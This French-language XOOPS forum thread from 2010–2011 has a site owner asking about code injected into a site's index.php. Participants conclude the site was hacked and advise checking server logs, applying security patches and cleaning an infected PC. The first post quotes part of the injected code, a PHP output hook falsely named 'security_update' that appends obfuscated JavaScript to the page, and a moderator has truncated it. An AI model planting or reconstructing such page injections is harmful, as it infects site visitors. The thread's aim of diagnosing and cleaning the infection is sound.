Fork me on GitHub






virus possible
Semi pro
Inscrit: 01/08/2005 19:06
Messages: 1851
bonjour,

j'ai créer y a déjà quelque temps un site pour un client et depuis peut quand j'allais sur le site en question j'avais avast qui me detecter un virus sur la page d'accueil et seulement sur cette page

j'ai donc trouvé ceci sur la page index.php a la racine de mon site

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['
a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['
r']="";
var s = df_;
for(__fh=0;this['
__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj........
'
;}//important security update ?>


est ce que cela et bien le virus ou sa fait partie de l'index mais depuis que j'ai supprimé ces lignes plus de virus détecter par avast

[Edité par Philou ... suppression d'une partie du code cité.]

Posté le : 14/12/2010 09:25
Partager Twitter Partagez cette article sur GG+
Re: virus possible
Semi pro
Inscrit: 01/08/2005 19:06
Messages: 1851
Personne ne serai me dire quel serai ce type de virus si sa en ai un ?

Posté le : 14/12/2010 20:13
Partager Twitter Partagez cette article sur GG+
Re: virus possible
Xoops accro
Inscrit: 20/02/2008 20:27
De Belgium
Messages: 2708
SVP ne publiez pas du code malicieux dans le forum.
Votre site est probablement piratée.

Posté le : 14/12/2010 20:21

Salutations, Gerard.
PS: Excusez mon mauvais français.
De la bonne manière de poser les questions
Partager Twitter Partagez cette article sur GG+
Re: virus possible
Admin Frxoops
Inscrit: 04/02/2003 16:46
De Blois
Messages: 3071
J'ai supprimé une partie du code publié.....

Effectivement ton site a été piraté. Il faut que tu regardes dans les logs de ton serveur pour voir par ou le pirate a pu entrer.
Ton hébergeur peut aussi t'aider sur ce sujet.

Posté le : 15/12/2010 07:55
Partager Twitter Partagez cette article sur GG+
Re: virus possible
Semi pro
Inscrit: 05/02/2006 23:34
De Ile-de-France
Messages: 523
Bonjour,

Je viens de rencontrer le même cas sur 2 sites.
L'un d'eux n'utilise pas l'identification de membre.

Les deux sont en hébergement mutualisé.

Dans un premier temps après avoir remis le bon index.php
je l'ai transformé en lectures seule.

à suivre...

@+
Z

EDT : Après recherche, les deux sites étaient en 2.3.3.
Il y a un patch de sécurité à appliquer sur cette version.

@+
Z

Posté le : 02/05/2011 15:59
Partager Twitter Partagez cette article sur GG+
Re: virus possible
Supporter Xoops
Inscrit: 09/01/2005 13:37
De Breizh
Messages: 16972
Bonjour
Citation :
zorro87 a écrit :
Après recherche, les deux sites étaient en 2.3.3.
Il y a un patch de sécurité à appliquer sur cette version.


de nombreux depuis la sortie de cette version, maintenant nous sommes en Xoops 2.5.1 - il est grand temps de se mettre à jour

Posté le : 02/05/2011 20:04

La connaissance s'accroît quand on la partage ...
Partager Twitter Partagez cette article sur GG+
Re: virus possible
Semi pro
Inscrit: 05/02/2006 23:34
De Ile-de-France
Messages: 523
Bonjour,

Kris tu as raison !

En ce qui me concerne, j'ai retrouvé ce même code rajouté sur un autre site non xoops.
(Petit site simple avec 5 pages php)
La même modification apparaissait sur index.php.

Il est donc très probable que mon PC était infecté par un virus qui aurait injecté ce code par FTP.

Un bon nettoyage viral du PC a donc été fait.

@+
Z

Posté le : 05/05/2011 15:36
Partager Twitter Partagez cette article sur GG+
Re: virus possible
Supporter Xoops
Inscrit: 09/01/2005 13:37
De Breizh
Messages: 16972
Possible que ce soit ton pc ou le serveur - il est nécessaire d'avoir à jour sa version d'apache

Posté le : 06/05/2011 08:09

La connaissance s'accroît quand on la partage ...
Partager Twitter Partagez cette article sur GG+

 Haut   Précédent   Suivant



Vous pouvez voir les sujets.
Vous ne pouvez pas débuter de nouveaux sujets.
Vous ne pouvez pas répondre aux contributions.
Vous ne pouvez pas éditer vos contributions.
Vous ne pouvez pas effacez vos contributions.
Vous ne pouvez pas ajouter de nouveaux sondages.
Vous ne pouvez pas voter en sondage.
Vous ne pouvez pas attacher des fichiers à vos contributions.
Vous ne pouvez pas poster sans approbation.

Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

47 Personne(s) en ligne (35 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 47 | Plus ...